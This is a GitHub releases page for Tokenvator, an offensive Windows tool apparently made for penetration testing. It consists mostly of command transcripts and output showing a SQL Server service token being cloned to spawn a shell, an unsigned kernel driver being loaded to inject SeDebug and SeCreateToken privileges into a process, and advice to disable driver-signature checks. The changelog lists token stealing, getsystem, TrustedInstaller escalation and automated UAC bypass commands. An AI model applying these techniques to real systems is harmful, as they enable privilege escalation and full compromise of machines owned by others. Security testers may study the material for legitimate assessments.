Releases: 0xbadjuju/Tokenvator
Releases · 0xbadjuju/Tokenvator
Added Clone_Token
C:\>Tokenvator.exe Clone_Token /Process:3824 /Command:cmd.exe
(Tokens) >
Option Value
------ -----
process 3824
command cmd.exe
[+] 3824 sqlservr
[*] Command: cmd.exe
[*] Arguments:
[*] If the above doesn't look correct you may need quotes
[+] SeCreateTokenPrivilege is present and enabled on the token
[-] SeSecurityPrivilege is not enabled on the token
[*] Enabling SeSecurityPrivilege on the token
[*] Adjusting Token Privilege SeSecurityPrivilege => SE_PRIVILEGE_ENABLED
[+] Recieved luid
[*] AdjustTokenPrivilege
[+] Adjusted Privilege: SeSecurityPrivilege
[+] Privilege State: SE_PRIVILEGE_ENABLED
_SECURITY_QUALITY_OF_SERVICE
_OBJECT_ATTRIBUTES
[*] Recieved Process Handle 0x02E4
[*] Recieved Token Handle 0x02E8
[+] Source: Advapi
[+] User:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Enumerated 12 Groups:
S-1-16-12288 Some or all identity references could not be translated.
S-1-1-0 Everyone
S-1-5-21-258464558-1780981397-2849438727-1005 DESKTOP-J5KC1AR\PdwComputeNodeAccess
S-1-5-32-558 BUILTIN\Performance Monitor Users
S-1-5-32-545 BUILTIN\Users
S-1-5-6 NT AUTHORITY\SERVICE
S-1-2-1 CONSOLE LOGON
S-1-5-11 NT AUTHORITY\Authenticated Users
S-1-5-15 NT AUTHORITY\This Organization
S-1-5-5-0-217494 Some or all identity references could not be translated.
S-1-2-0 LOCAL
S-1-5-80-0 NT SERVICE\ALL SERVICES
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 9 Privileges
Privilege Name Enabled
-------------- -------
SeAssignPrimaryTokenPrivilege False
SeIncreaseQuotaPrivilege False
SeShutdownPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeImpersonatePrivilege True
SeCreateGlobalPrivilege True
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
[+] Owner:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Primary Group:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] ACL Count: 659
[*] Updating Desktop DACL
[+] hDesktop : 0x02F0
[+] Recieved DACL : 0x293CC0284C4
[+] Create Everyone Sid - Pass 1 : 0x000C
[+] Create Everyone Sid - Pass 2 : 0x293CC03F530
[+] Added Everyone to DACL : 0x293CC03A0B0
[+] Applied DACL to Object
[+] hWinSta0 : 0x0318
[+] Recieved DACL : 0x293CC04B8B4
[+] Create Everyone Sid - Pass 1 : 0x000C
[+] Create Everyone Sid - Pass 2 : 0x293CC03F610
[+] Added Everyone to DACL : 0x293CC053400
[+] Applied DACL to Object
[*] CreateProcessWithTokenW
[+] Created process: 7140
[+] Created thread: 11228
Like Create_Token, Clone_Token requires SeCreateTokenPrivilege
Release 3
See the NetSPI blog for full details:
https://www.netspi.com/blog/technical/network-penetration-testing/tokenvator-release-3/
(Tokens) > Install_Driver /ServiceName:TokenDriver /Path:C:\Share\KernelTokens.sys
Option Value
------ -----
servicename TokenDriver
path C:\Share\KernelTokens.sys
[*] Service Name: TokenDriver
[*] Service Path: C:\Share\KernelTokens.sys
[*] Using Service Name TokenDriver
[*] Connecting to .
[+] Connected to .
[*] Full Path: C:\Share\KernelTokens.sys
[+] Opened service
[+] Started Service
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeCreateTokenPrivilegee
Option Value
------ -----
process notepad
privilege SeCreateTokenPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED063
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880000
[+] Updated Present Value : 0x602880004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C4
[*] Recieved Token Handle 0x02C8
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 6 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
(Tokens) > Add_Privilege /Process:notepad /Privilege:SeDebugPrivilege lege
Option Value
------ -----
process notepad
privilege SeDebugPrivilege
[+] 8568 notepad
[+] Connected to Driver
[*] Sending IOCTL 2285592
[+] 72 Bytes Returned
[+] PEPROCESS Base Address : 0xFFFFBC0F8A59F080
[+] EX_FAST_REF Base Address : 0xFFFFBC0F8A59F538
[+] EX_FAST_REF Data : 0xFFFF95027C1ED062
[+] TOKEN Base Address : 0xFFFF95027C1ED060
[+] PSEP_TOKEN_PRIVILEGES Base Address : 0xFFFF95027C1ED0A0
[+] Current Present Value : 0x602880004
[+] Updated Present Value : 0x602980004
[+] Enabled : 0x800000
[+] EnabledByDefault : 0x40800000
[*] Disconnected from Driver
(Tokens) > List_Privileges /Process:Notepad
Option Value
------ -----
process Notepad
[+] 8568 Notepad
Remote: True
Impers: False
[*] Recieved Process Handle 0x02C8
[*] Recieved Token Handle 0x02CC
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 7 Privileges
Privilege Name Enabled
-------------- -------
SeCreateTokenPrivilege False
SeShutdownPrivilege False
SeDebugPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
Note: The KernelToken.sys driver is compiled and attached, but is not signed.
If you want to test it without signing it run the command bcdedit /debug on and restart.
Note: This release is for .Net 4.5 x64
Release 2 Update 2 Beta
Update to add support for interactive sub-processes
(Tokens) > run cmd.exe
[+] Starting cmd.exe
[*] Note: The prompt is currently missing for input
Microsoft Windows [Version 10.0.17763.379]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
C:\Tokenvator\Tokenvator\bin\Release-Net45>whoami
windows10pro\0xbadjuju
dir
C:\Tokenvator\Tokenvator\bin\Release-Net45>dir
Volume in drive C has no label.
Volume Serial Number is A624-B8DD
Directory of C:\Tokenvator\Tokenvator\bin\Release-Net45
03/22/2019 11:38 AM <DIR> .
03/22/2019 11:38 AM <DIR> ..
09/15/2018 02:29 AM 3,010,560 System.Management.Automation.dll
02/21/2019 11:45 AM 161 Tokenvator.exe.config
03/22/2019 11:28 AM 112,128 Tokenvator.pdb
03/22/2019 11:28 AM 117,760 Tokenvator.exe
4 File(s) 3,240,609 bytes
2 Dir(s) 84,676,734,976 bytes free
exit
C:\Tokenvator\Tokenvator\bin\Release-Net45>exit
(Tokens) > run powershell.exe
[+] Starting powershell.exe
[*] Note: The prompt is currently missing for input
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
gci
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> gci
Directory: C:\Tokenvator\Tokenvator\bin\Release-Net45
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2018 2:29 AM 3010560 System.Management.Automation.dll
-a---- 2/21/2019 10:45 AM 161 Tokenvator.exe.config
-a---- 3/22/2019 11:28 AM 112128 Tokenvator.pdb
-a---- 3/22/2019 11:28 AM 117760 Tokenvator.exe
exit
PS C:\Tokenvator\Tokenvator\bin\Release-Net45> exit
Release 2 Update 1
Adds support for semi-interactive consoles such as Metasploit's channelized IO and PsExec.
Release 2
Bug Fix Testing Release 1
Potential fix for request by 0xhexmex for bypassuac command line arguments to be added
Potential for for Backspace triggers System.ArgumentOutOfRangeException
Blog Release
Usability Improvements
- Left and Right Arrow Keys, Delete Key, and mid sentence insertions now work as expected
- Up and Down Arrow Keys traverse the scroll back history as expected
- Search path for executables now works out side of the System32 folder (Yay! PowerShell)
- Relative paths now work for execuatables
v1.2.0
Run multiple commands as arguments
- tokenvator.exe whoami; getsystem; whoami
Added tab complete to interactive mode
Add token privilege to remote process
- Set_Privilege 2583 SeSecurityPrivilege
Under the hood fixes:
- Added extra checks to ensure primary are returned during automated checks
- Added ability to differentiate between SYSTEM and Network Service when the machine account name is returned as the user
Bug Fixes:
- Fixed GetSystem and GetTrustedInstaller is failing due to searching for wrong name
- Fixed BypassUAC on Window 10
Errata
- Multiple components failing on 4.6 - Likely due to intptr size
v1.1.0
Multiple enhancements have been made.
It is now possible to selectively alter the token privileges of the current process.
- list_privileges
- set_privilege SeSecurityPrivilege
Tokens can now be taken from processes by the executable name instead of just the Process ID.
- steal_token calc.exe
Processes can now be searched for by a particular user.
- find_user_processes domain\user
Added whoami and reverttoself.
Added automated bypassuac which will find an target eligible processes based upon integrity level and user.
- bypassuac cmd.exe
Added listing interactive user sessions
- list_user_sessions
Process are now primarily enumerated via native APIs instead of WMI, however the WMI features are still available as a backup.